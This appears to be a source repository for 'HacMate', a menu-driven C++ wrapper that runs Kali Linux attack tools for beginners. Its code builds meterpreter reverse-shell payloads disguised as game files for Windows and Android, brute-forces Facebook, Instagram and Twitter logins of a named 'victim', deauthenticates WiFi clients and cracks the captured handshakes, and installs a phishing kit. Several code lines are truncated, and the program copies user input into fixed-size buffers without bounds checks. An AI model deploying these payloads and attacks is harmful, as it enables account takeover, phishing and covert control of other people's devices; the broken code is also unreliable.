├── Presentation.pdf
├── interface.sh
├── README.md
└── sourcecode.cpp
/Presentation.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rgroshanrg/hacking-interface-for-linux/HEAD/Presentation.pdf
--------------------------------------------------------------------------------
/interface.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | echo Compiling....
3 | gcc sourcecode.cpp
4 | echo Running Script...
5 | ./a.out
6 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # hacking-interface-for-linux
2 |
A Simplified Hacking Interface for Beginners in Kali Linux
3 |
It uses internal available tools in kali linux for pentesting without going deep into command line.
4 |
It is for those who wants an easy interface for kali linux tools
5 |
--------------------------------------------------------------------------------
/sourcecode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 |
7 | void Net_Scanning();
8 | void Phishing();
9 | void Wifi_Hacking();
10 | void Pass_Cracking();
11 | void BackDoor();
12 | void Choice();
13 | void Custom_Password_List();
14 |
15 | using namespace std;
16 |
17 | void Custom_Password_List() {
18 | char ch;
19 | cout<<"\n\n\n\t\t\x1B[34m* Do you want to install required tool (for new user, using thist tool for 1st time) [Y/N]*\033[0m\t\t\n\n";
20 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
21 | cin>>ch;
22 | if(ch == 'Y' || ch == 'y')
23 | system("git clone https://github.com/Mebus/cupp.git");
24 | system("cd cupp;python3 cupp.py -i");
25 | }
26 |
27 | void BackDoor() {
28 | char ch;
29 | int key;
30 | while(key!=10) {
31 | cout<<"\n\n\n\x1B[34m************* Please Enter Your Choice *************\033[0m\t\t\n\n\n\n";
32 | cout<<" 1. Access Windows (BackDoor Access)\n";
33 | cout<<" 2. Access Android (BackDoor Access)\n";
34 | cout<<" 10. Go Back\n";
35 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
36 | cin>>key;
37 | char ip[16];
38 | switch (key) {
39 | case 1: {
40 | char gen_cmd[] = "msfvenom -p windows/meterpreter/reverse_tcp LHOST=";
41 | cout<<"\n\n\n\t\t\x1B[34m* Enter your ip address (ifconfig) *\033[0m\t\t\n\n";
42 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
43 | cin>>ip;
44 | strcat(gen_cmd,ip);
45 | cout< /var/www/html/pgame.exe";
48 | strcat(gen_cmd,temp);
49 | cout<\033[0m";
57 | cin>>ch;
58 | cout<<"Use the following command in msf5> console : "<<"\n\n"<<"\tuse exploit/multi/handler\n\n\tset Payload windows/meterpreter/reverse_tcp\n\n\tset LHOST "<\033[0m";
67 | cin>>ip;
68 | strcat(gen_cmd,ip);
69 | cout< /var/www/html/pgame.apk";
72 | strcat(gen_cmd,temp);
73 | cout<\033[0m";
81 | cin>>ch;
82 | cout<<"Use the following command in Metasploit msf5> console : "<<"\n\n"<<"\tuse exploit/multi/handler\n\n\tset Payload android/meterpreter/reverse_tcp\n\n\tset LHOST "<\033[0m";
109 | cin>>key;
110 | char username[30];
111 | char pass_list[50];
112 |
113 | switch(key) {
114 | case 1: {
115 | char cmd[] = "cd;brut3k1t -s facebook -u ";
116 | cout<<"\n\n\n\t\t\x1B[34m* Enter the UserName of Victim *\033[0m\t\t\n\n";
117 | cin>>username;
118 | cout<<"\n\n\n\x1B[34m* Enter the Path of Passwords List (wordlist) {referring from root in .txt format} *\033[0m\t\t\n\n";
119 | cin>>pass_list;
120 | strcat(cmd,username);
121 | strcat(cmd," -w ");
122 | strcat(cmd,pass_list);
123 | system(cmd);
124 | }
125 | break;
126 | case 2: {
127 | char cmd[] = "cd;brut3k1t -s instagram -u ";
128 | cout<<"\n\n\n\t\t\x1B[34m* Enter the UserName of Victim *\033[0m\t\t\n\n";
129 | cin>>username;
130 | cout<<"\n\n\n\x1B[34m* Enter the Path of Passwords List (wordlist) {referring from root in .txt format} *\033[0m\t\t\n\n";
131 | cin>>pass_list;
132 | strcat(cmd,username);
133 | strcat(cmd," -w ");
134 | strcat(cmd,pass_list);
135 | system(cmd);
136 | }
137 | break;
138 | case 3: {
139 | char cmd[] = "cd;brut3k1t -s twitter -u ";
140 | cout<<"\n\n\n\t\t\x1B[34m* Enter the UserName of Victim *\033[0m\t\t\n\n";
141 | cin>>username;
142 | cout<<"\n\n\n\x1B[34m* Enter the Path of Passwords List (wordlist) {referring from root in .txt format} *\033[0m\t\t\n\n";
143 | cin>>pass_list;
144 | strcat(cmd,username);
145 | strcat(cmd," -w ");
146 | strcat(cmd,pass_list);
147 | system(cmd);
148 | }
149 | break;
150 | case 10: return;
151 | break;
152 | default : cout<<"\x1B[91mInvalid Key Entered\033[0m";
153 | }
154 | }
155 | }
156 |
157 | void Wifi_Hacking() {
158 | char ch;
159 | char wlan_name[10];
160 | cout<<"\n\n\n\t\t\x1B[34m* Enter Your Wireless Card id *\033[0m\t\t\n\n";
161 | cout<<"\t [ You can find it by running ifconfig command in new terminal (Ex-wlan0, wlan1) ]\n\n\n\n";
162 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
163 | cin>>wlan_name;
164 | char wlanmon[15];
165 |
166 | strcpy(wlanmon,wlan_name);
167 | strcat(wlanmon,"mon");
168 | char start[] = "airmon-ng start ";
169 | strcat(start,wlan_name);
170 | system(start);
171 | system("airmon-ng check kill");
172 | strcpy(start,"airodump-ng ");
173 | strcat(start,wlanmon);
174 |
175 | cout<<"\n\n\n\t\t [ Now you have to note down the MAC Address and CH no.(channel no.) of the target ]\n\n\t\t\t NOTE : Target should appear on both the interfaces \n\t\t\t i.e., atleast one device should be connected with the target. \n\n \tYou should enter ctrl+c if note is done\n\n\n \t ENTER ANY ALPHA KEY IF YOU ARE READY\n\n\n";
176 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
177 | cin>>ch;
178 | system(start);
179 | char mac_add[20];
180 | char channel_no[5];
181 |
182 | cout<<"\n\n\n\t\t\x1B[34m* Enter the victim's MAC Address *\033[0m\t\t\n\n";
183 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
184 | cin>>mac_add;
185 |
186 | cout<<"\n\n\n\t\t\x1B[34m* Enter the victim's Channel Number (CH no.) *\033[0m\t\t\n\n";
187 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
188 | cin>>channel_no;
189 |
190 | cout<<"\n\n \t\t [ Enter the following command in NEW TERMINAL (in same directory) ] \n\n \t\t\t\t airodump-ng -c -w -b wlan0mon\n\n\n \t ENTER ANY ALPHA KEY IF YOU ARE READY\n\n\n";
191 |
192 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
193 | cin>>ch;
194 | char long_cmd[] = "airplay-ng -0 0 -a ";
195 | strcat(long_cmd,mac_add);
196 | strcat(long_cmd," ");
197 | strcat(long_cmd,wlanmon);
198 | system(long_cmd);
199 | cout<<"\n\n Enter any ALPHA key if HandShake is done in new TERMINAL";
200 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
201 | cin>>ch;
202 | system("aircrack-ng -w rockyou.txt aircrack-01.cap");
203 | strcpy(long_cmd,"airmon-ng stop ");
204 | strcat(long_cmd,wlanmon);
205 | system(long_cmd);
206 | system("rm aircrack-01.cap;rm aircrack-01.csv;rm aircrack-01.kismet.netxml;rm aircrack-01.kismet.csv");
207 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
208 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
209 | cin>>ch;
210 | }
211 |
212 |
213 | void Phishing() {
214 | char ch;
215 | int key;
216 | cout<<"\n\n\n\x1B[34m************* Please Enter Your Choice *************\033[0m\t\t\n\n\n\n";
217 | cout<<" 1. Open HiddenEye\n";
218 | cout<<" 2. Install HiddenEye(For new users) and open\n";
219 | cout<<" 10. Go Back\n";
220 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
221 | cin>>key;
222 | while(key!=10) {
223 | switch(key) {
224 | case 1: system("cd HiddenEye;python3 HiddenEye.py");
225 | break;
226 | case 2: system("apt-get install git -y;git clone https://github.com/DarkSecDevelopers/HiddenEye.git;cd HiddenEye;pip install -r requirements.txt;pip3 install wget;python3 HiddenEye.py");
227 | break;
228 | case 10: return;
229 | break;
230 | default : cout<<"\x1B[91mInvalid Key Entered\033[0m";
231 | }
232 | }
233 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
234 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
235 | cin>>ch;
236 | }
237 |
238 |
239 | void Net_Scanning() {
240 |
241 | char ip[30];
242 | char ch;
243 | int key;
244 | while (key!=10) {
245 |
246 | cout<<"\n\n\n\x1B[34m************* Please Enter Your Choice *************\033[0m\t\t\n\n\n\n";
247 | cout<<" 1. Find Live Hosts on Network\n";
248 | cout<<" 2. Find and Ping all Live Hosts on Network\n";
249 | cout<<" 3. Find Open Ports on Host\n";
250 | cout<<" 4. Find Services Listening on Ports on Hosts\n";
251 | cout<<" 5. Check for Vulnerabilities on Hosts\n";
252 | cout<<" 6. Aggressive Scan\n\n\n";
253 | cout<<" 10. Go Back to Main Menu";
254 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
255 | cin>>key;
256 |
257 |
258 | switch (key) {
259 | case 1: {
260 |
261 | cout<<"\n\t\t\x1B[36mEnter the ip to Scan :\033[0m";
262 | cout<<"\n\n\x1B[93mHacMate[~]->\033[0m";
263 | cin>>ip;
264 | char st[] = "nmap -sL ";
265 | strcat(st,ip);
266 | cout<<" Entered Command <"<";
267 | system(st);
268 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
269 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
270 | cin>>ch;
271 | }
272 | break;
273 | case 2: {
274 | cout<<"\n\t\t\x1B[36mEnter the ip to Scan :\033[0m ";
275 | cout<<"\n\n\x1B[93mHacMate[~]->\033[0m";
276 | cin>>ip;
277 | char st[] = "nmap -sn ";
278 | strcat(st,ip);
279 | cout<<" Entered Command <"<";
280 | system(st);
281 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
282 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
283 | cin>>ch;
284 | }
285 | break;
286 | case 3: {
287 | cout<<"\n\t\t\x1B[36mEnter the ip to Scan :\033[0m ";
288 | cout<<"\n\n\x1B[93mHacMate[~]->\033[0m";
289 | cin>>ip;
290 | char st[] = "nmap ";
291 | strcat(st,ip);
292 | cout<<" Entered Command <"<";
293 | system(st);
294 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
295 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
296 | cin>>ch;
297 | }
298 | break;
299 | case 4: {
300 |
301 | cout<<"\n\t\t\x1B[36mEnter the ip to Scan :\033[0m ";
302 | cout<<"\n\n\x1B[93mHacMate[~]->\033[0m";
303 | cin>>ip;
304 | char st[] = "nmap -sV ";
305 | strcat(st,ip);
306 | cout<<" Entered Command <"<";
307 | system(st);
308 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
309 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
310 | cin>>ch;
311 | }
312 | break;
313 | case 5: {
314 | system("locate .nse | grep ftp");
315 |
316 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
317 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
318 | cin>>ch;
319 | }
320 | break;
321 | case 6: {
322 | cout<<"\n\t\t\x1B[36mEnter the ip to Scan :\033[0m ";
323 | cout<<"\n\n\x1B[93mHacMate[~]->\033[0m";
324 | cin>>ip;
325 | char st[] = "nmap -A ";
326 | strcat(st,ip);
327 | cout<<" Entered Command <"<";
328 | system(st);
329 | cout<<"\n\n\n\n\nEnter any Alpha Key to go back : ";
330 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
331 | cin>>ch;
332 | }
333 | break;
334 | case 10: return;
335 | break;
336 | default : cout<<"\x1B[91mInvalid Key Entered\033[0m";
337 | }
338 | }
339 | }
340 |
341 |
342 | int main() //main function
343 | {
344 | system("clear");
345 | Choice(); //calling chioce function
346 |
347 | system("clear");
348 |
349 | return 0;
350 | }
351 |
352 |
353 | void Choice() {
354 | system("clear");
355 | int key;
356 | while(key != 10) {
357 | cout<<"\n\n";
358 | cout<<" HHH HHH MMM MMM\n HHH HHH MMMM MMMM\n HHHHHHHHH MMM MM MM MMM\n HHHHHHHHH MMM MMM MMM\n HHH HHH MMM M MMM\n HHH HHH MMM MMM";
359 | cout<<"\n\n\n\x1B[34m************* Please Enter Your Choice *************\033[0m\t\t\n\n\n\n";
360 | cout<<" 1. Network Scanning\n";
361 | cout<<" 2. Phishing Attack\n";
362 | cout<<" 3. Wifi Hacking\n";
363 | cout<<" 4. Password Cracking\n";
364 | cout<<" 5. Backdoor Access\n";
365 | cout<<" 6. Custom Password List\n";
366 | cout<<"\n\n 10. \x1B[91m\"\033[0mExit\x1B[91m\"\033[0m\t\t";
367 | cout<<"\n\n\n\n\x1B[93mHacMate[~]->\033[0m";
368 | cin>>key;
369 | switch(key){
370 | case 1: Net_Scanning();
371 | break;
372 | case 2:
373 | Phishing();
374 | break;
375 | case 3:
376 | Wifi_Hacking();
377 | break;
378 | case 4:
379 | Pass_Cracking();
380 | break;
381 | case 5:
382 | BackDoor();
383 | break;
384 | case 6:
385 | Custom_Password_List();
386 | break;
387 | case 10: exit(0);
388 | break;
389 | default : cout<<"\x1B[91mInvalid Key Entered\033[0m";
390 | }
391 | }
392 |
393 | }
394 |
--------------------------------------------------------------------------------